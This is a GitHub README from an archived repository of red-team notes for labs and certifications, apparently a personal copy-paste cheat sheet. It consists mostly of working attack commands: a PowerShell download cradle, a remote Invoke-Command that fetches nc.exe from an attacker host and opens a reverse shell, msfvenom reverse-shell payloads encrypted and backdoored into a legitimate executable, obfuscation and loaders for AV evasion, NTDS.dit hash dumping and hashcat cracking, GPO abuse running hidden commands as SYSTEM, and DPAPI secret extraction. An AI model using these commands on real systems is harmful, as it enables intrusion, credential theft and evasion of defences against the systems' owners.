Skip to content
This repository has been archived by the owner on May 13, 2022. It is now read-only.
/ red Public archive

Collection of things used for Labs and Certifications that are useful stored in one place

Notifications You must be signed in to change notification settings

p4yl0ad/red

Repository files navigation

Lab_Notes

Collection of red team things used in labs and courses that might be useful

Mix of homebrew / others tooling, very much a curated collection of references to copy and paste.

Fanboy moment:

Fucking great ippsec like dashlane search

rockyou2021 link

Poggy simple sig based evasion

Traffic smuggling / evasion

AMSI/AV

Shellcode runners C/C++ very c h i n a

EoP file write

Yes


Subnet mask / CIDR / IPV4 Calculator


ASM / hex assembler/dissasembler


Base64 conversion (buggywuggy <3)

echo 'iex (iwr http://uwu.sex/fuck.nut -useb)' | python3 -c 'import sys; import base64; print("powershell -ec",base64.b64encode(sys.stdin.readline().encode("utf-16le")).decode())'

weird phishing

  • ms-word://ofe/%7Cu%7Chttp://example.com/myTestDocument.docx
  • =cmd|' /c notepad'!A0

General phishing

DDE's


Quieter Host Recon:

#cmd.exe
echo %userdomain%
echo %logonserver%
echo %homepath%
echo %homedrive%
net share
net accounts
systeminfo
tasklist /svc
gpresult /z
net localgroup Administrators 
netsh advfirewall show allprofilesstate
systeminfo 

#powershell
$env:ComSpec
$env:USERNAME
$env:USERDOMAIN
$env:LOGONSERVER
tree /f $home 

writing to disk mkdir C:\Software & attrib +h c:\Software


Get-EventLog -LogName "Application" | where {$_.Message -like '*username*' -or $_.Message -like '*password*' -or $_.Message -like '*pass*'} | select Message | format-table -wrap

Sticky notes

ls $env:LocalAppData\Packages\Microsoft.MicrosoftStickyNotes_XXXXXXXXXXXXXXXXXX\LocalState

Capping hashes from beachhead:

. .\Inveigh-OBFUSCATED.ps1;Invoke-Inveigh -ConsoleOutput Y -Elevated N -FileOutput Y -FileOutputDirectory C:\software\.poon -FileUnique Y

Quieter exec:

  • powershell ([char]45+[char]101+[char]99) YwBhAGwAYwA=

$pass=(ConvertTo-SecureString "Passw0rd!" -AsPlainText -Force); $cred=(New-Object System.Management.Automation.PSCredential("TEST\Administrator", $pass)); Invoke-Command -ComputerName pc-1 -Credential $cred -ScriptBlock { wget http://attacker-ip/nc.exe -O C:\Users\Public\nc.exe; C:\Users\Public\nc.exe -e C:\Windows\system32\nc.exe attacker-ip 4444 }

Fucking with netsh:

$pass=(ConvertTo-SecureString "Passw0rd!" -AsPlainText -Force); 
$cred=(New-Object System.Management.Automation.PSCredential("test.local\Administrator", $pass)); 
Invoke-Command -ComputerName pc-2.test.local -Credential $cred -ScriptBlock {
    netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8080 connectaddress=10.0.0.X
    netsh advfirewall firewall add rule name="My Sweet Local Port" dir=in action=allow protocol=TCP localport=8080
}

Obfuscation, patching and evasion

Just read these blogs , trust me.

Cleaning SharpGPOAbuse:

oof.crproj

<project outputDir="C:\tools\SharpGPOAbuse\SharpGPOAbuse\bin\Release\CONFUSED" baseDir="C:\tools\SharpGPOAbuse\SharpGPOAbuse\bin\Release\" xmlns="http://confuser.codeplex.com">
  <rule pattern="true">
    <protection id="anti debug" />
    <protection id="anti dump" />
    <protection id="anti ildasm" />
    <protection id="anti tamper" />
    <protection id="constants" />
    <protection id="ctrl flow" />
    <protection id="invalid metadata" />
    <protection id="ref proxy" />
    <protection id="resources" />
  </rule>
  <module path="C:\tools\SharpGPOAbuse\SharpGPOAbuse\bin\Release\SharpGPOAbuse.exe">
    <rule pattern="true" preset="maximum" inherit="false" />
  </module>
  <module path="..\..\..\packages\CommandLineParser.1.9.3.15\lib\CommandLine.dll">
    <rule pattern="true" preset="maximum" inherit="false" />
  </module>
  <probePath>C:\tools\SharpGPOAbuse\SharpGPOAbuse\bin\Release\</probePath>
</project>

SharpLoader

  1. RUN https://github.com/the-xentropy/xencrypt on the loader to drop to a CIFS share on prem
Invoke-Xencrypt -infile C:\tools\Invoke-SharpLoader\Invoke-SharpLoader.ps1 -outfile C:\tools\Invoke-SharpLoader\Invoke-SharpLoader-OBFUSCATED.ps1 -Iterations 100
  1. Then Encrypt SharpGPOAbuse as it gets flagged
Invoke-SharpEncrypt -file C:\CSharpFiles\SafetyKatz.exe -password S3cur3Th1sSh1t -outfile C:\CSharpEncrypted\SafetyKatz.enc

Upload to CIFS share on prem where 'Invoke-SharpLoader-OBFUSCATED.ps1' was uploaded And decrypt/run with args

Assembly /assemblyname:"SharpGPOAbuse" /parameters:"--AddComputerTask --TaskName \"Legit Task\" --Author NT AUTHORITY\SYSTEM --Command \"cmd.exe\" --Arguments \"/c powershell -nop -w hidden -enc [...snip...]\" --GPOName \"Another Totally Legit GPO\""
Invoke-SharpLoader -location C:\EncryptedCSharp\Rubeus.enc -password S3cur3Th1sSh1t -argument kerberoast -argument2 "/format:hashcat"

https://adsecurity.org/?p=2604

## Malware
function SuperDecrypt
{
param($script)
$bytes = [Convert]::FromBase64String($script)
## XOR “encryption”
$xorKey = 0x42
for($counter = 0; $counter -lt $bytes.Length; $counter++)
{
$bytes[$counter] = $bytes[$counter] -bxor $xorKey
}
[System.Text.Encoding]::Unicode.GetString($bytes)
}
$decrypted = SuperDecrypt FUIwQitCNkInQm9CCkItQjFCNkJiQmVCEkI1QixCJkJlQg==
Invoke-Expression $decrypted

Import-Module .\PowerView.ps1
$Username = 'administrator'
$Password = 'peepeepoopoo'
$pass = ConvertTo-SecureString -AsPlainText $Password -Force
$Cred = New-Object System.Management.Automation.PSCredential -ArgumentList $Username,$pass
Set-DomainUserPassword -Identity Domain_Admin_username -Password $pass -Credential $Cred

Compress-Archive -Path C:\Users\Public\Downloads\poon -DestinationPath C:\Users\Public\Downloads\poon.zip

#Install-Module DSInternals -Force

Import-Module DSInternals
$Key = Get-BootKey -SystemHiveFilePath C:\Users\p4yl0ad\Desktop\AD\poon\registry\SYSTEM
 
Get-ADDBAccount -BootKey $Key -DatabasePath 'C:\Users\p4yl0ad\Desktop\AD\poon\Active Directory\ntds.dit' -All |
  Format-Custom -View HashcatNT | 
  Out-File C:\Users\p4yl0ad\Desktop\AD\poon\Hashdump.txt

./kwp -z basechars/full.base keymaps/en-us.keymap routes/2-to-16-max-3-direction-changes.route > kwp3.txt

hashcat -m 1000 -a 0 Hashdump.txt -o Cracked.txt /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt -r /usr/share/hashcat/rules/best64.rule

hashcat -m 1000 -a 0 Hashdump.txt -o Cracked-otrta.txt /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt -r /usr/share/hashcat/rules/otrta.rule

hashcat -m 1000 -a 3 --custom-charset1=?l?d?u --username -o cracked.txt .\Hashdump.txt ?1?1?1?1?1?1?1?1

Ran out of options:

hashcat -m 13100 -a 0 --outfile hashnamecracked.txt hash.txt /opt/SecLists/Passwords/*.txt --force -r
/usr/share/hashcat/rules/best64.rule
#!/bin/bash

list=$(find /opt/SecLists/Passwords -type f | grep -i ".txt")

for file in $list
do
	echo $file
	hashcat -m 1000 -a 0 -O -w 3 --outfile cracked-hashes.txt hashes.txt $file --force -r /usr/share/hashcat/rules/best64.rule
done
#!/bin/bash

list=$(find /opt/SecLists/Passwords -type f | grep -i ".txt")

for file in $list
do
	echo $file
	hashcat -m 1000 -a 0 -O -w 3 --outfile cracked-hashes.txt hashes.txt $file --force -r /usr/share/hashcat/rules/otrta.rule
done

shell new-gpo -name ropeoftheneck | new-gplink -target "OU=Domain Controllers,DC=DOMAIN,DC=LOCAL" -LinkEnabled Yes -Enforced Yes -Order 1 
shell .\SharpGPOAbuse-merge.exe --addcomputertask --taskname "getpooned" --author "DOMAIN\administrator" --command "cmd.exe" --arguments "/c \Windows\system32\spool\drivers\color\launcher.bat" --gponame "ropeoftheneck" --force 
gpupdate /force 

Shortcut with powershell

$TargetFile = "$env:SystemRoot\System32\calc.exe"
$ShortcutFile = "C:\experiments\cpl\calc.lnk"
$WScriptShell = New-Object -ComObject WScript.Shell
$Shortcut = $WScriptShell.CreateShortcut($ShortcutFile)
$Shortcut.TargetPath = $TargetFile
$Shortcut.Save()

//stager mods
public static string GetMessageFormat
{
         get
         {
                  var sb = new StringBuilder(@"{{""GUID"":""{0}"",");
                  sb.Append(@"""Type"":{1},");
                  sb.Append(@"""Meta"":""{2}"",");
                  sb.Append(@"""IV"":""{3}"",");
                  sb.Append(@"""EncryptedMessage"":""{4}"",");
                  sb.Append(@"""HMAC"":""{5}""}}");
                  return sb.ToString();
         }
}
                  
//then                  
string MessageFormat = GetMessageFormat;
//executor mods
private static string EncryptedMessageFormat
{
         get
         {
                  var sb = new StringBuilder(@"{{""GUID"":""{0}"",");
                  sb.Append(@"""Type"":{1},");
                  sb.Append(@"""Meta"":""{2}"",");
                  sb.Append(@"""IV"":""{3}"",");
                  sb.Append(@"""EncryptedMessage"":""{4}"",");
                  sb.Append(@"""HMAC"":""{5}""}}");
                  return sb.ToString();
         }
}
//then
private static string GruntEncryptedMessageFormat = EncryptedMessageFormat;

Browser D33ts:

(crto_cov) > powershell Get-BrowserData -Browser All

Cannot find path 'C:\Users\p4yl0ad\AppData\Local\Google\Chrome\User Data\Default\History' because it does not exist.


Browser User  DataType Data                                                                               
------- ----  -------- ----                                                                              
IE      p4yl0ad History  https://p4yl0ad.github.io/                                                     
IE      p4yl0ad History  https://p4yl0ad.github.io/                                                              
IE      p4yl0ad History  https://p4yl0ad.github.io/


exe

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=tun0 LPORT=443 --arch x64 --platform windows --encoder x64/xor_dynamic --encrypt-iv --encrypt
rc4 --encrypt-key neoncatkeysignature --iterations 60 --timeout 10 -b '\x00' -n 22 -x kitty-0.74.4.11.exe -f exe > neoncat1.exe

Encrypting C# shellcode

msfvenom --platform windows -p windows/shell_reverse_tcp LHOST=192.168.152.100 LPORT=80 -f csharp --encrypt aes256 --encrypt-key 12345678901234567890123456789012 --encrypt-iv 1234567890123456

generate a csharp bytearray with msf

msfvenom --platform windows -p windows/shell_reverse_tcp LHOST=192.168.152.100 LPORT=80 -f csharp -o reverse-tcp.txt msfvenom --platform windows -p windows/x64/exec CMD='cmd.exe /c start calc.exe' -f powershell

Utilize Simple Loader to create an encoded b64 string and insert into the loader git clone https://github.com/cribdragg3r/Simple-Loader.git

[i] Encrypting Data
[i] Replace the hiphop variable with your new payload:

         String hiphop = "ZxOy1Bks+Vfrlq8wcmyHY8GwwiBZd8NGrGQiKvx15hcv9sQ9apoO6NGbNBxAeS4NLHSz4owcdPgQTTejYJr80Ke4ynoy41yrc5R+D0uqt1ppyxDAeYGATQy7xFbN247gwFee5cPZAFyBzbI6DvOLBFSJiP6+4kv5T7pX3iapVsX7ORmg7Ubfa1M9P/cYNm5qzS9dyHxFde/D578YA6DGYC0/UPzmeDXB11R0MWmPAkRGFftQp+YdurMHce1R4HC9bdCXIO3fdx7Gjy/pDwzh9eMtApiQa1B0Y7ZcEWj0LLHwl0kvAodjTX+M+tQJrsFmA53OcwzDlzlVD6YFXP9uOegIOif+bPSKnCXU0aRaY+U7RRr3QbBCfMtwAm1G6bwHrL6q1jeeWeZN+sWxZbCHnW6mNAOGeV/aG8qod5AqhlIXeIGomvKoPs4bxZ2wNEd7";

Remove all strings that are trigger words e.g. comments and "shellcode" "meterpreter" etc etc

Utilize confuserEX to obfuscate the binary generated by the output git clone https://github.com/yck1509/ConfuserEx.git


DPAPI

$exfil = Get-Content -Path C:\Users\Public\Downloads\oof.txt | ConvertTo-SecureString ; [Runtime.InteropServices.Marshal]::PtrToStringAuto([Runtime.InteropServices.Marshal]::SecureStringToBSTR((($exfil))))

Import-Module .\FileCryptography.psm1
$key = 'AhXpFs[...REDACTED...]LxlUqc0Y='
Unprotect-File .\exfil.txt.AES AES $key

Byte array for combo with shellc loader

$bytes = [System.IO.File]::ReadAllBytes("Grunt.bin");
$bytes -join ","

Current Users SID no whoami /all: cmd.exe /c wmic useraccount where name='%username%' get sid Covenant: shellcmd wmic useraccount where name='%username%' get sid

SI 0 -> SI >=1?


**Converting kirbi to base64 for covenant imports

[System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes("C:\Users\IEUser\Desktop\golden.kirbi"))

Using a web proxy with (new-object net.webclient)downloadstring:

$Username="Hugo"
$Password="abcdefgh"
$WebProxy = New-Object System.Net.WebProxy("http://webproxy:8080",$true)
$url="http://aaa.bbb.ccc.ddd/rss.xml"

$WebClient = New-Object net.webclient

$WebClient.Proxy=$webproxy
$WebClient.proxy.Credentials = New-Object System.Net.NetworkCredential($Username, $Password)
$path="C:\Users\hugo\xml\test.xml"
$WebClient.DownloadFile($url, $path)

weird file permissions:

$path = C:\Users\administrator\Desktop\secrets.txt
$acl=get-acl $path
$accessrule = New-Object system.security.AccessControl.FileSystemAccessRule("DOMAIN\user.name","Read",,,"Allow")
$acl.RemoveAccessRuleAll($accessrule)
Set-Acl -Path $path -AclObject $acl

Or

get-acl C:\Users\administrator\Desktop\desktop.ini | Set-Acl C:\Users\administrator\Desktop\secrets.txt

Digging into DCOM

Get-CimInstance -class Win32-DCOMApplication | select appid,name
$obj = [activator]::CreateInstance([type]::GetTypeFromCLSID("C947D50F-378E-4FF6-8835-FCB50305244D"))
$obj | get-member
  • gwmi Win32_COMSetting -computername 127.0.0.1 | ft LocalServer32 -autosize | Out-String -width 4096 | out-file dcom_exes.txt
  • gwmi Win32_COMSetting -computername 127.0.0.1 | ft InProcServer32 -autosize | Out-String -width 4096 | out-file dcom_dlls.txt
$file = gc C:\Users\test\desktop\dcom_things.txt
foreach ($binpath in $file) {
 $binpath
 cmd.exe /c dir $binpath > $null
}

[activator]::CreateInstance([type]::GetTypeFromCLSID("C947D50F-378E-4FF6-8835-FCB50305244D","target"))

About

Collection of things used for Labs and Certifications that are useful stored in one place

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published